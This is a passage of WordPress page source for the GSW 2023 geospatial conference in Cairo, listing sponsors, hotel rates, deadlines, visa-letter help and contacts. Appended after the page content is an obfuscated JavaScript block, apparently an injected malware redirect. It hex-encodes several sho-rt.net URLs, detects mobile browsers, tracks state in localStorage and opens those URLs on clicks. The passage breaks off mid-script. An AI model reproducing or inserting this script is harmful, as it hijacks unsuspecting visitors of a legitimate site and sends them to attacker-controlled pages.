center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 